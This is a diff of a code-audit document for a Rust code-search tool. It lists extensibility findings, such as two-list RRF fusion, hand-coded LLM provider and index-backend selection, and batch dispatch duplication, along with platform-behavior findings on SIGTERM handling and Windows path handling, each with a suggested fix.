+- **Location:** `src/store/search.rs:182-229` (`Store::rrf_fuse(semantic_ids: &[&str], fts_ids: &[String], limit) -> Vec<(String, f32)>`), `src/search/query.rs:511-720` (`search_hybrid` linear-α dense+sparse), `src/search/query.rs:399` (call site uses 2-list `rrf_fuse`)
+- **Description:** Today there are two completely separate ways to combine ranked candidate lists into a final score:
+  1. `Store::rrf_fuse(semantic_ids, fts_ids, limit)` — RRF formula `1/(k+rank)`, hardcoded to **exactly two** input lists (semantic embedding + FTS keyword). The function signature has named `semantic_ids` and `fts_ids` parameters; adding a third signal (a name-fingerprint signal, a type-overlap signal, the SPLADE sparse list, or the cross-encoder rerank score) requires changing the signature plus every caller.
+  2. `Self::search_hybrid` — a separate dense+sparse linear-interpolation path with its own α knob (`splade_alpha`), its own min-max normalization, its own dedup loop. SPLADE blends here, not via RRF, because RRF is locked to two lists.
+  
+  Concrete symptom: SPLADE is built and persisted at index time, but cannot be one of the inputs to RRF — it lives on a parallel `search_hybrid` path with different normalization (linear interp, not reciprocal-rank). The "type boost" added at `query.rs:449-454` is a *third* score-mutation site (multiplicative post-fusion) that's neither RRF-fused nor α-blended; it's just a hardcoded multiplier applied after the fact. Adding the planned reranker score as a fusion input (rather than the current "rerank top-K post-hoc" mode) would force a fourth bespoke blend path.
+- **Suggested fix:** Generalize `rrf_fuse` to `fn rrf_fuse_n(ranked_lists: &[&[&str]], limit: usize) -> Vec<(String, f32)>` so any number of ranked sources contribute. Optionally introduce `trait ScoreSignal { fn rank(&self, query: &Query) -> Vec<&str>; fn weight(&self) -> f32; }` and a `FusionPipeline` that owns an ordered list of signals — semantic, FTS, SPLADE, name-fingerprint, type-boost all become uniform participants. Either fix collapses two parallel code paths into one and removes the "RRF can't take SPLADE" architectural quirk.
 
-#### `LlmProvider` enum: adding a new provider requires editing 5+ sites with no compile-time glue
-- **Difficulty:** medium
-- **Location:** `src/llm/mod.rs:198-202` (enum), `:165-167` (hardcoded `API_BASE`, `MODEL`), `:282-296` (provider resolver), `:353-366` (`create_client` env-var match), `src/llm/batch.rs:65` (hardcoded `anthropic-version` HTTP header), `:103, 150, 229` (`is_valid_anthropic_batch_id` gate hardcoded in transport layer)
-- **Description:** `LlmProvider::Anthropic` is the only variant, with a trailing `// Future: OpenAI, Local, etc.` comment that's been there long enough to rot. Adding `LlmProvider::OpenAI` requires: (1) adding the variant (easy), (2) editing the `match std::env::var("CQS_LLM_PROVIDER")` resolver to recognize the new name (line 282), (3) editing the `env_var = match llm_config.provider` in `create_client` (line 358), (4) implementing `BatchProvider` for a new struct (not for a generic `LlmClient` — the trait-obj story exists but `create_client` returns a concrete `LlmClient`, not `Box<dyn BatchProvider>` — line 366), (5) making `API_BASE` + `MODEL` + batch-id validation (`is_valid_anthropic_batch_id`) + HTTP headers (`anthropic-version`, `x-api-key`) provider-specific. Today those are file-level `const`s and hardcoded values in `batch.rs`. The `EX-31/EX-34` comment at `mod.rs:353` acknowledges this: "When adding providers, match on llm_config.provider here". That's precisely the pressure this finding is about — the plan to add providers is documented but every seam is single-provider-shaped. Verified by reading `create_client` (returns concrete `LlmClient`, not `Box<dyn BatchProvider>`) and `batch.rs:65` (HTTP `anthropic-version: 2023-06-01` header is a literal).
-- **Suggested fix:** Make `create_client` return `Box<dyn BatchProvider>`; move `API_BASE` / `MODEL` / env-var-name / HTTP-header-shape / `is_valid_batch_id(&str) -> bool` into the `BatchProvider` trait (or an associated `ProviderMetadata` struct). Then `Anthropic` is one impl, `OpenAI` is a new file. `create_client` becomes `match provider { Anthropic => Box::new(AnthropicProvider::new(...)), OpenAI => Box::new(OpenAiProvider::new(...)) }` — one match, three lines per provider.
-
-#### `AuxModelKind` preset registration duplicates the dispatch structure across a growing kind×preset matrix
-- **Difficulty:** medium
-- **Location:** `src/aux_model.rs:35-46` (`AuxModelKind` enum), `:136-148` (`config_from_dir` filename layout match on kind), `:166-173` (`preset` function dispatches to `splade_preset` or `reranker_preset`), `:177-200` (`splade_preset` hand-maintained), `:202-220` (`reranker_preset` hand-maintained), `:221-227` (`default_preset_name` separate match)
-- **Description:** SPLADE and reranker today; a third aux kind (e.g. a future `Summarizer` ONNX model, or a dedicated `CodeEmbedder` preset pool separate from the main `ModelConfig` one) would need: new variant in `AuxModelKind`, new match arm in `config_from_dir` (for on-disk layout), new `foo_preset()` function, new arm in `preset()` dispatcher, new arm in `default_preset_name()`. Five parallel match-arms for one concept. And adding a preset within an existing kind (say a 3rd SPLADE variant) means editing the dedicated `splade_preset` function — contrast with `define_embedder_presets!` which makes adding a preset a one-row macro extension. Verified by reading `aux_model.rs:136-222` — five concept-coupled matches on `AuxModelKind` in the same file.
-- **Suggested fix:** Apply the `define_embedder_presets!` macro pattern to aux models: a single `define_aux_presets!` table where each row is `(kind, name, aliases, repo_or_path_template, layout)`. The `preset()`, `default_preset_name()`, `config_from_dir()` layout decisions all derive from the table. Alternative: make `AuxModelConfig` a trait-object with `trait AuxModelProvider { fn name() -> &str; fn on_disk_layout(root: &Path) -> (PathBuf, PathBuf); fn presets() -> &[(&str, &str)]; }` and register per-kind in a `Vec<Box<dyn AuxModelProvider>>`.
-
-#### `NotesListArgs` (batch) and `NotesCommand::List` (CLI) are two hand-maintained argument structs for the same command
+#### `BatchCmd::is_pipeable` is a separate exhaustive match outside the command registry
 - **Difficulty:** easy
-- **Location:** `src/cli/args.rs:527-540` (`NotesListArgs` struct: `warnings`, `patterns` — no `check`) vs `src/cli/commands/io/notes.rs:49-65` (`NotesCommand::List { warnings, patterns, output, check }`)
-- **Description:** The CLI `notes list` surface has a `--check` flag; the batch surface's shared-arg struct doesn't. Adding a new flag to `notes list` today requires updating both structs. The drift is already visible — the `--check` flag is silently dropped on the daemon path (already flagged in batch1-api-design as "NotesListArgs missing --check"). This is the same class as the explicitly-landed `SearchArgs` refactor (#947) — the rest of the notes surface never got unified. All other commands that have a shared `FooArgs` struct flattened into both `Commands::Foo { args: FooArgs, output: TextJsonArgs }` AND `BatchCmd::Foo { args: FooArgs, ... }` avoid drift by construction. Verified by reading `cli/args.rs:527-540` and `cli/commands/io/notes.rs:49-65` — the two structs are side-by-side, no shared source.
-- **Suggested fix:** Lift `NotesListArgs` to carry every flag (`warnings`, `patterns`, `check`) then have `NotesCommand::List` flatten it the same way `Commands::Search { args: SearchArgs, output: TextJsonArgs }` does. Delete the inline fields on `NotesCommand::List`. One source of truth; new flags auto-propagate to both CLI and daemon-batch surfaces.
+- **Location:** `src/cli/batch/commands.rs:325-364` (`BatchCmd::is_pipeable(&self) -> bool`), `src/cli/batch/commands.rs:413-538` (`fn dispatch(ctx, cmd) -> Result<Value>`), `src/cli/registry.rs:55-720` (the `for_each_command!` registry that already classifies commands)
+- **Description:** Issue #1097 (PR #1114) collapsed five Group-A/B exhaustive matches in `dispatch.rs` + `definitions.rs` (`batch_support`, `variant_name`, two dispatch matches, plus the legacy `BatchSupport::Cli/Daemon` decision) into a single `for_each_command!` row per command. But the **batch-side** `BatchCmd` enum was not lifted into the same registry — it still has two exhaustive matches that must be hand-edited per command:
+  - `is_pipeable()` (39-line two-arm match: pipeable vs non-pipeable)
+  - `dispatch()` (130-line single-arm-per-variant match calling `handlers::dispatch_*`)
+  
+  And the batch enum itself lists 31 variants alongside the `Commands` enum — same surface, different file. Verified by reading `cli/batch/commands.rs:413-538` (the dispatch is a per-variant `BatchCmd::Foo { args, .. } => handlers::dispatch_foo(ctx, &args.x, &args.y, …)` chain; pure mechanical mapping, exhaustive, no compile-time link to the `Commands` enum, no link to the `for_each_command!` registry). Reduces #1114's "one row per command" promise to "one row, one batch enum variant, two batch matches".
+- **Suggested fix:** Either (a) drive `BatchCmd` from `for_each_command!` so adding a row in the registry generates the `BatchCmd` variant + `is_pipeable` arm + dispatch arm + handler stub, with the row optionally carrying a `is_pipeable: true` flag and the handler ident. Or (b) merge `Commands` and `BatchCmd` into a single enum (clap derive supports this) with `is_pipeable` derived from a registry attribute. Either path eliminates the parallel batch-side fan-out.
 
-#### `cli/commands/infra/init.rs` hardcodes model sizes to a `dim >= 1024` heuristic
+#### `LlmProvider` resolver and `create_client` factory hardcode two providers — no registry, despite already needing one
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/init.rs:42-50` (`let size = if cli.try_model_config()?.dim >= 1024 { "~1.3GB" } else { "~547MB" };`)
-- **Description:** The download size hint is a 2-way dimension split — "dim>=1024 → 1.3GB, else → 547MB". Current presets (BGE-large 1024-dim=1.3GB, E5-base 768-dim=547MB) happen to sit on either side of that threshold. A custom 768-dim model distilled to 200MB reports "547MB". A 1024-dim quantized 600MB model reports "1.3GB". When the next preset ships at 1536-dim or 512-dim, the heuristic breaks again. Verified by reading `init.rs:42-50` — the two size strings and the boundary are literals, not sourced from `ModelConfig`.
-- **Suggested fix:** Add an optional `approx_download_bytes: Option<u64>` field to `ModelConfig` / `define_embedder_presets!` row. For presets we ship, set it to the real figure; for user-supplied custom models, leave `None` and fall through to "(size unknown)". Removes the heuristic, stays a one-row edit per preset, and doesn't lie about custom-model sizes.
+- **Location:** `src/llm/mod.rs:200-205` (`LlmProvider` enum: 2 variants), `:284-304` (`match std::env::var("CQS_LLM_PROVIDER")` matches the strings `"anthropic"` / `"local"` literally), `:362-398` (`create_client` matches `LlmProvider::Anthropic` / `::Local` and constructs the per-provider client + writes the per-provider config-validation error message)
+- **Description:** `create_client` now returns `Box<dyn BatchProvider>` (closing the bulk of EX-V1.29-3), and `LocalProvider` is a real second impl (#1101). But the **registration** of providers is still hand-coded in three places:
+  1. `LlmProvider` enum in `mod.rs:200-205` (one variant per provider)
+  2. `resolve()` env-var match in `mod.rs:284-304` (`Some("anthropic") | None => …, Some("local") => …, Some(other) => warn + default`) — adding a third provider requires another arm here. The env-var-name-to-variant table is implicit in this match.
+  3. `create_client()` factory in `mod.rs:362-398` (one match arm per provider; each arm reads its own env vars — `ANTHROPIC_API_KEY`, etc. — and validates its own preconditions)
+  
+  The `API_BASE` (`https://api.anthropic.com/v1`), `API_VERSION` (`2023-06-01`), and `MODEL` (`claude-haiku-4-5`) constants in `mod.rs:167-169` are still file-level Anthropic defaults; the same constants double-duty as "is this user configured for local?" sentinels at `:381-394` (`if llm_config.api_base == API_BASE { return Err("Local requires CQS_LLM_API_BASE") }`). Add a third provider (e.g. OpenAI cloud, Gemini) and you must add its own sentinel-detection arm too.
 
-#### Tree-sitter query file naming is the only glue between `LanguageDef::chunk_query` and `queries/*.scm` — no compile-time check
+  And `batch.rs:64-261` carries 5 hardcoded `header("anthropic-version", API_VERSION)` + `header("x-api-key", &self.api_key)` calls — the `LlmClient` impl bakes Anthropic's auth scheme. A new "OpenAI cloud" provider can't reuse `LlmClient`; it must be a fresh `BatchProvider` impl (which is fine — the trait is set up for it) but the env-var resolver and the factory both still need editing.
+- **Suggested fix:** Introduce `trait ProviderRegistry { fn name(&self) -> &'static str; fn from_env(&self, cfg: &Config) -> Result<Box<dyn BatchProvider>>; }` and an inventory-style `static REGISTRY: &[&dyn ProviderRegistry]`. `resolve()`'s env-var match and `create_client`'s factory both walk the slice. Adding a provider then means: (1) impl `ProviderRegistry` for the new struct, (2) add it to the slice. The `API_BASE / MODEL / API_VERSION` constants move into the Anthropic-specific impl where they belong.
+
+#### Vector index backend selection is a `#[cfg]`-gated hand-coded if/else chain — no `IndexBackend` trait
 - **Difficulty:** medium
-- **Location:** `src/language/languages.rs` (every `definition_*` fn uses `chunk_query: include_str!("queries/<lang>.chunks.scm")` literal), `src/language/queries/*.scm`
-- **Description:** Each language definition's `chunk_query` / `call_query` / `type_query` is wired via `include_str!("queries/<lang>.chunks.scm")`. A typo in the filename (`queries/rust.chunk.scm` missing the `s`) is a compile error — that part is fine. But: (1) if a language's queries directory gets renamed, nothing in the registry validates that every registered language has matching query files; the language silently returns empty chunks because the query compiles to a no-op. (2) There's no test that iterates `REGISTRY.all()` and ensures each `chunk_query` is non-empty (empty string compiles — `include_str!` of a 0-byte file compiles too). (3) Adding a new query kind (e.g., a hypothetical `docs_query` for extracting docstring content separately) would require editing `LanguageDef` and then fanning out `include_str!` calls across every `definition_*` function. Not a footgun today but the pressure mounts as query kinds grow (3 today: chunks, calls, types).
-- **Suggested fix:** Either (a) add a startup self-test that iterates `REGISTRY.all()` and asserts every language with a grammar has a non-empty `chunk_query` — makes the "silently empty query" trap impossible, or (b) thread the query source through a single `fn load_query(lang_name: &str, kind: QueryKind) -> &'static str` that reads from a compile-time `phf`-style map keyed by (language, kind). New query kinds then require editing one enum + one table row per language that supports it, not every `definition_*` function.
+- **Location:** `src/cli/store.rs:423-540` (`build_vector_index_with_config<Mode>`)
+- **Description:** Today the function is a 120-line `#[cfg(feature = "cuda-index")]` block with three explicit branches: (1) "chunk_count >= cagra_threshold AND gpu_available → CAGRA, try persisted, else build, persist", (2) "chunk_count < cagra_threshold → HNSW", (3) "GPU unavailable → HNSW". Each branch hand-codes the persistence path (`index.cagra` literal, `delete_persisted` cleanup, magic-number checks, fallback-on-failure). Adding a third backend requires:
+  - A new `cagra_threshold`-style `CQS_FOO_THRESHOLD` env var
+  - A new branch in this if/else chain
+  - A new persisted-path literal + load-then-rebuild fallback
+  - A new structured `tracing::info!(backend = "foo", …)` log line per code path
+  - A new `gpu_available()` (or equivalent) gate
+  - A new `delete_persisted` cleanup hook
+  
+  All of this is mechanical; nothing in `index::VectorIndex` lets a backend declare its own threshold / persistence path / availability gate. `VectorIndex` itself is a clean trait (HNSW and CAGRA both implement it), but the **selector** isn't trait-driven. Concrete pressure: the v1.30.0 release ships the `cuda-index` feature split (#956 Phase A) which already names "future Metal / ROCm" backends; each addition will edit this chain again.
+- **Suggested fix:** Extend `VectorIndex` with `fn try_open(cqs_dir: &Path, store: &Store<Mode>) -> Option<Box<dyn VectorIndex>>` (where `None` means "I'm not the right backend for this config") and `fn priority(store: &Store) -> i32` (higher wins). Build a `&[&dyn IndexBackend]` slice; selection iterates highest-priority-first and returns the first non-None `try_open`. The `cagra_threshold` lives inside CAGRA's `try_open`, the `gpu_available` lives inside CAGRA's `priority`, the `index.cagra` filename lives inside CAGRA's persistence. HNSW becomes the always-priority-zero fallback. New backends are pure additions to the slice.
 
-#### Config schema: adding a `[foo]` section to `.cqs.toml` requires edits to 3-4 files with no shared pattern
-- **Difficulty:** medium
-- **Location:** `src/config.rs:138-190` (`Config` struct), `src/cli/config.rs:132-167` (`apply_config_defaults`), plus whichever consumer reads the field
-- **Description:** Today `Config` is a flat struct with optional sub-sections for `scoring`, `splade`, `reranker`, `embedding`, and references. Adding a new `[router]` (or `[cache]`, or `[daemon]`) section requires: (1) new `RouterConfig` struct in `config.rs` with serde derives, (2) new optional field on `Config` with `#[serde(default)]`, (3) an `if let Some(ref x) = config.router { apply_router_config(...) }` chain in the consumer, (4) a new `apply_config_defaults` arm if any field overrides a CLI default. `apply_config_defaults` only knows about top-level scalar fields (`limit`, `threshold`, `name_boost`, `quiet`, `verbose`, `stale_check`) — every section-config is applied ad-hoc by its consumer. Verified by reading `cli/config.rs:132-167`: 6 hand-written `if cli.x == DEFAULT_X` arms, no way to register "apply my config section" without editing this file. Moreover, the sibling `DEFAULT_LIMIT` / `DEFAULT_THRESHOLD` / `DEFAULT_NAME_BOOST` constants must stay in lockstep with clap `#[arg(default_value = ...)]` attributes — that requirement is explicitly documented as a "SYNC REQUIREMENT" in the file header. Three-way sync between clap, the module const, and `apply_config_defaults` per defaulted option.
-- **Suggested fix:** Introduce `trait ConfigSection { fn apply_to_cli(&self, cli: &mut Cli); }` or a method on `Config` that enumerates its own sections. Use clap's `ArgSource` instead of comparing against module-level `DEFAULT_*` constants so the sync requirement vanishes — `cli.args_seen[&Id::new("limit")] != ValueSource::DefaultValue` means "user set it explicitly". Each new section then registers itself via impl; `apply_config_defaults` collapses to `config.sections().for_each(|s| s.apply_to_cli(cli))`. Harder than a typical audit fix but eliminates a whole class of "I added a config field and it's silently ignored" bugs.
-
-#### `aux_model::config_from_dir` and `reranker_preset` hardcode on-disk layout per kind — third-party forks or re-packaged bundles break silently
+#### Tree-sitter query files are wired by `include_str!` per-row — no runtime / startup self-test that registry → query files are consistent
 - **Difficulty:** easy
-- **Location:** `src/aux_model.rs:136-148` (`config_from_dir` match on `AuxModelKind`), `:212-217` (reranker preset hardcodes `onnx/model.onnx` + `tokenizer.json`), `:188-198` (SPLADE preset hardcodes `model.onnx` + `tokenizer.json`)
-- **Description:** `config_from_dir` has a 2-arm match on `AuxModelKind` encoding the on-disk layout convention: SPLADE bundles live as `{dir}/model.onnx` + `{dir}/tokenizer.json`; reranker bundles follow the HF cross-encoder convention `{dir}/onnx/model.onnx` + `{dir}/tokenizer.json`. A user whose SPLADE bundle ships as `{dir}/onnx/model.onnx` (to match the HF layout convention) or whose reranker repo skipped the `onnx/` subdirectory (some HF reranker forks do) gets a silent "file not found" much later at load time — not at config resolution, where the error message would be actionable. And the hardcoded path-template in each `*_preset` function means adding a preset that ships with a different layout (e.g. `tokenizer.json.gz` or `tokenizer.model` for sentencepiece) requires editing both the preset fn and `config_from_dir`.
-- **Suggested fix:** Move `onnx_path` + `tokenizer_path` into a per-preset field on `AuxModelConfig` (they're already there) and have `config_from_dir` take them as parameters rather than deriving them from `kind`. Then the kind enum becomes just a scoping tag, and presets / user overrides can name their files freely. Removes the two-layer hardcoding (kind → layout + preset → layout) so a 3rd aux kind doesn't need to re-decide.
+- **Location:** `src/language/queries/*.scm` (109 files), `src/language/languages.rs` (each row uses `chunk_query: include_str!("queries/<lang>.chunks.scm")`), no test that asserts coverage
+- **Description:** Each `LanguageDef` row in `languages.rs` literally embeds its query strings via `include_str!("queries/<name>.<kind>.scm")`. A typo in the path is a build error — that part is fine. But:
+  - There's no test that iterates `REGISTRY.all()` and asserts every code-carrying language has a non-empty `chunk_query` (an empty .scm file `include_str!`s as `""` and compiles to a no-op tree-sitter query — the language silently emits zero chunks).
+  - There's no test that scans `src/language/queries/*.scm` and asserts every file is referenced by at least one language row (orphan .scm files don't break anything but are pure dead weight, and a *partially wired* language — chunks.scm but no calls.scm — won't error at compile time even though the runtime impact is "calls graph never populated for this language").
+  - Adding a new query kind (e.g. a hypothetical `docs.scm` for docstring extraction) means editing every `definition_*` function to add an `include_str!` arm, with no compile-time assertion that "every language with a grammar declared a docs.scm".
+  
+  Verified by walking `language/queries/`: 109 files, no `tests/queries_consistent.rs` or similar self-test. The 54 supported languages × up to 3 query kinds = 162 cells, ~109 files filled — the gap (53 missing-by-design) is invisible without a registry walk.
+- **Suggested fix:** Add a single `#[test] fn registry_coverage() { for lang in REGISTRY.all() { if has_grammar(lang) { assert!(!lang.chunk_query.is_empty(), "{lang:?} chunk_query empty"); } } }` in `language/mod.rs`. Catches the silent-empty-query trap with a single test. For new query kinds, layer a `phf`-style `static QUERIES: phf::Map<(&str, QueryKind), &str>` so adding a kind requires editing the map (one place) instead of every `definition_*` function.
 
-Summary: 9 extensibility findings. Dominant pressure: the CLI→batch dispatch fan-out (one command touches 5 exhaustive matches in 4 files), plus hardcoded-per-language custom logic that should have rolled into `LanguageDef`, plus "trait exists but only-one-impl" provider patterns (`LlmProvider`, `AuxModelKind`) that name the extensibility point without actually paying for it.
+#### `ScoringOverrides` adds a knob → must edit 4 sites (struct, defaults, env-var resolver, consumer)
+- **Difficulty:** medium
+- **Location:** `src/config.rs:153-172` (`ScoringOverrides` struct, 11 `Option<f32>` fields), `src/search/scoring/*.rs` (`ScoringConfig::DEFAULT` consts), `src/store/search.rs:11-42` (`RRF_K_CONFIG_OVERRIDE` + `rrf_k()` env-var-or-config resolver — one of these per knob), wherever the consumer reads it
+- **Description:** Each scoring knob (`name_exact`, `parent_boost_cap`, `splade_alpha`, `rrf_k`, …) requires editing four places: (1) the struct, (2) a `pub const DEFAULT_*: f32 = …` sibling, (3) the per-knob env-var resolver function (e.g., `fn rrf_k() -> f32`), (4) the consumer that reads the resolved value. There's no shared resolver. Concrete: adding the queued "type boost factor" knob (`CQS_TYPE_BOOST` is already an env override at `query.rs:449-454`, but it doesn't appear in `ScoringOverrides` so it's environment-only — the `.cqs.toml` `[scoring]` section can't set it). New scoring knobs added by the same author have already drifted out of the `[scoring]` section schema.
+- **Suggested fix:** Make `ScoringOverrides` a `HashMap<&'static str, f32>` (or a `serde(flatten)` wrapper) plus a `static SCORING_KNOBS: &[ScoringKnob]` table where each row is `(name, env_var, default, kind)`. Resolver becomes `fn resolve_knob(name: &str) -> f32` driven by the table. Adding a knob = one row. Drops the four-site fan-out to one. Bonus: enables `cqs config show` to dump every knob and its source (env / config / default) without keeping a hand-maintained list.
 
----
+#### `NoteEntry` has no kind / tag taxonomy — sentiment-only, can't filter for a class
+- **Difficulty:** medium
+- **Location:** `src/note.rs:41-67` (`NoteEntry { sentiment: f32, ... }`, `Note { sentiment: f32, ... }`), `src/note.rs:79-89` (sentiment → "Warning: " / "Pattern: " prefix is the only kind taxonomy)
+- **Description:** Notes carry a single `sentiment: f32` axis (CLAUDE.md documents 5 discrete values: `-1, -0.5, 0, 0.5, 1`). The only "kind" is implicit: sentiment < `-0.3` → "Warning:", sentiment > `+0.3` → "Pattern:", else neutral. There's no formal `kind` field. Adding a separate retrievable note class (e.g. `kind = "todo"` / `"design-decision"` / `"deprecation"` / `"known-bug"` — all of which appear in MEMORY.md and PROJECT_CONTINUITY.md as ad-hoc text patterns the user wants searchable) requires:
+  - Schema migration: new `notes.kind TEXT` column
+  - `NoteEntry` struct change
+  - TOML serialization roundtrip update (`docs/notes.toml` parser)
+  - `cqs notes add --kind …` flag
+  - Search filter: `cqs notes list --kind …`
+  - Sentiment-prefix logic at `note.rs:79-89` becomes kind-prefix
+  
+  Today the workaround is "encode the kind in the note text" (e.g. `"TODO: rebuild HNSW after migration"`), which is unsearchable as structured data. The schema-version churn for adding a column is the friction — CLAUDE.md "always do things properly" doesn't currently extend to notes shape.
+- **Suggested fix:** Add a `kind: Option<String>` field on `NoteEntry` (free-string, not enum, so it's not a 50-language-style registry problem). Add a `notes.kind` SQLite column at the next schema bump. Treat `sentiment_to_prefix` as the legacy fallback for entries with `kind = None`. Filter shape: `cqs notes list --kind todo` becomes a column filter, not a regex on `text`.
+
+#### `LanguageDef::structural_matchers` is per-language `Option<&[(name, fn)]>` — no shared library of common matchers
+- **Difficulty:** easy
+- **Location:** `src/language/mod.rs:191` (`type StructuralMatcherFn = fn(&str, &str) -> bool;`), `:345` (`pub structural_matchers: Option<&'static [(&'static str, StructuralMatcherFn)]>`), `src/structural.rs:93-98` (lookup site)
+- **Description:** Structural matchers exist for one language so far (Rust, by reading `structural_matchers_default_none` at `language/mod.rs:2391-2395` — every other language returns `None`). The shape `Option<&'static [(&str, fn)]>` is fine for one language but doesn't scale: adding the same "swallow exceptions" or "async hot path" patterns for Python/JS/Go means rewriting the same predicate function bodies in each `definition_*` row, with no shared library. The Patterns enum at `structural.rs:44` already encodes language-agnostic ideas (`SwallowedException`, `AsyncIO`, `Mutex`, `Unsafe`) — but the matchers are per-language fn pointers, not a `(Pattern, Language) -> bool` table. The cross-language tests at `structural.rs:319-388` already cover Python/JS/Go/Rust for the *fallback regex matcher*, but the language-tuned matchers only exist for Rust.
+- **Suggested fix:** Move structural matchers to a `(Pattern, Language) -> Option<&'static dyn Fn(&str, &str) -> bool>` table (or expand `LanguageDef` rows to declare a `structural_matchers: &[(Pattern, fn)]` slice referencing shared functions). Adding the same pattern across 5 languages becomes 5 table rows pointing at one function, not 5 separate fn definitions per `definition_*`.
+
+#### `find_project_root` markers list is hardcoded — language-grammar registry has no link to "where would a project of this language root live"
+- **Difficulty:** easy
+- **Location:** `src/cli/config.rs:155-162` (hardcoded 6-marker list with embedded comment "EX-5: These markers are intentionally NOT derived from LanguageDef")
+- **Description:** The `markers` array `["Cargo.toml", "package.json", "pyproject.toml", "setup.py", "go.mod", ".git"]` is stable — the inline comment argues the alternative ("project_root_markers on LanguageDef") would dilute the language registry. Granted. But the *current shape* is a fixed array whose authoritative semantics are "these are the 5 languages with a unambiguous canonical project file, plus `.git` as fallback." It is documented as an intentional decision. The pressure point: if cqs ever grows first-class support for Maven (`pom.xml`), Gradle (`build.gradle`/`build.gradle.kts`), .NET solutions (`*.sln`), Bazel (`MODULE.bazel`/`WORKSPACE`), Mix (`mix.exs`), or Cargo workspaces with non-`Cargo.toml` markers — the list grows here, not in `languages.rs`. The decision "where does project-root-detection live" is settled, but the 6-marker list itself is documented as sufficient for now via a comment, not as data the registry actually owns.
+- **Suggested fix:** Convert to a `static PROJECT_ROOT_MARKERS: &[(&str, &str)] = &[("Cargo.toml", "rust"), …, (".git", "fallback")]` table at module level. The inline comment becomes the table's doc. Adding Maven (`pom.xml`, "java") is one row, not an `if current.join("pom.xml").exists()` arm. The "is this a workspace root?" Cargo-specific branch at `:167-172` keeps its dedicated logic but stops being in the middle of a `for marker in &markers` loop.
+
+#### Embedder constructor coupling: `define_embedder_presets!` rows generate `pub fn <variant_fn>(&self) -> Self` constructors but no per-preset config knob extension hook
+- **Difficulty:** easy
+- **Location:** `src/embedder/models.rs:163-300` (`define_embedder_presets!` macro), `:313-374` (the four shipped preset rows)
+- **Description:** Each preset row generates a method like `ModelConfig::bge_large(&self) -> Self` that fully populates `ModelConfig { repo, dim, max_seq_len, normalize_embeddings, query_prefix, doc_prefix, approx_download_bytes, pad_id, … }`. Adding a *cross-cutting* preset attribute (e.g. "this preset requires GPU because dim >= 1024", or "this preset's tokenizer expects BOS/EOS even though the default doesn't") means: editing `ModelConfig` (new field), editing the macro `@build_arm` to plumb the field through, editing every preset row to add the attribute. The 4 row × N field matrix is fine at 4 rows, but the preset-additive case still has a real fan-out per attribute. Verified by counting attributes per row: 9 fields per preset × 4 presets = 36 cells; one new field is 4 row-edits + 2 macro-edits.
+  
+  Lower priority than the others — the macro pattern actually *contains* this fan-out to one file. Flagging because the alternative (a `HashMap<&'static str, Value>` per row) would let adding a new attribute be a no-op for old presets that don't set it.
+- **Suggested fix:** Optional. If new preset attributes start landing frequently, extend the macro grammar with an `extras: { gpu_only = true, expects_bos = true }` block per row that maps to a `HashMap<&'static str, ModelAttr>` field on `ModelConfig`. Keeps required fields in the row's main shape, optional/sparse ones in `extras`. Skip if presets are stable.
+
+Summary: 9 extensibility findings. The original v1.29.0 9 findings have largely closed (registry refactor #1114, define_aux_presets, define_chunk_types, define_query_categories, ConfigSection, VisibilityRule extensions, NotesListArgs flatten, approx_download_bytes, Local LLM provider). Residual pressure now concentrates on (1) score-signal pluggability — RRF locked to two lists while SPLADE lives on a parallel α-blend path, (2) batch-side dispatch — `BatchCmd` enum + `is_pipeable` + dispatch matches did not get lifted into the registry alongside `Commands`, (3) provider/index backend selectors that still hand-code the "match on enum kind" factory shape despite having clean trait-objects on the consumer side, (4) implicit registries (project-root markers, structural matchers) that work fine today but document themselves as "intentionally not data" while bearing the structural-data shape.
+
 
 ## Platform Behavior
 
-#### PB-V1.29-1: `cqs context`/`cqs brief` fail on Windows when user types path with backslashes
+#### `cqs serve` shutdown_signal handles only Ctrl-C — `systemctl stop` skips graceful drain on Linux
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/io/context.rs:28,115` + `src/cli/commands/io/brief.rs:40-42`
-- **Description:** `cmd_context` and `cmd_brief` pass raw CLI `path: &str` through to `store.get_chunks_by_origin(path)`, which binds `WHERE origin = ?1`. The DB only ever stores forward-slash origins (enforced by `normalize_path` + the `debug_assert!(!origin.contains('\\'))` at `staleness.rs:589-592`). On Windows, a user / agent running `cqs context src\foo.rs` will get `"No indexed chunks found"` even when the file is indexed. `cmd_reconstruct` at `reconstruct.rs:32-39` proves the correct pattern (it calls `cqs::normalize_path` first); `cmd_context` and `cmd_brief` were missed.
-- **Suggested fix:** Normalize the user-supplied path before lookup:
-  ```rust
-  let path_norm = cqs::normalize_slashes(path);
-  let chunks = store.get_chunks_by_origin(&path_norm)?;
-  ```
-  Apply the same in `cmd_brief`, `dispatch_context`, and anywhere else that forwards CLI path to `get_chunks_by_origin[s_batch]`.
+- **Location:** src/serve/mod.rs:253-260
+- **Description:** `shutdown_signal()` awaits only `tokio::signal::ctrl_c()`. On Linux when `cqs serve` is run under systemd or any supervisor that issues `SIGTERM` (the default for `systemctl stop`), axum never sees the signal — it keeps serving until systemd escalates to `SIGKILL`. The watch daemon explicitly installs a SIGTERM handler via `libc::signal` (src/cli/watch.rs:132-148), but the serve binary does not. On macOS `launchd` ALSO sends SIGTERM by default. Result: the "press Ctrl-C to stop" banner is the only documented graceful shutdown, and any service-manager wrapper sees forced kills with no graceful_shutdown future polled.
+- **Suggested fix:** On `cfg(unix)` race `tokio::signal::ctrl_c()` against `tokio::signal::unix::signal(SignalKind::terminate())` via `tokio::select!`. On Windows also accept `ctrl_break()` and `ctrl_close()`.
 
-#### PB-V1.29-2: Watch SPLADE encoder passes Windows `file.display()` to `get_chunks_by_origin` — silent no-op
+#### `EmbeddingCache::default_path` and `QueryCache::default_path` hardcode `~/.cache/cqs/...` on Windows
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:1083-1085`
-- **Description:**
-  ```rust
-  for file in changed_files {
-      let origin = file.display().to_string();
-      let chunks = match store.get_chunks_by_origin(&origin) { ... };
-  ```
-  On Windows `PathBuf::display()` emits the verbatim `\\?\C:\...` prefix for canonicalized paths AND backslash separators. DB origins are stored as relative + forward-slash via `normalize_path`. So `get_chunks_by_origin(&origin)` returns `Ok(vec![])` on Windows, `encode_splade_for_changed_files` silently produces an empty batch, and `cqs watch --serve` never updates the SPLADE index for any modified file on Windows. Silent correctness failure.
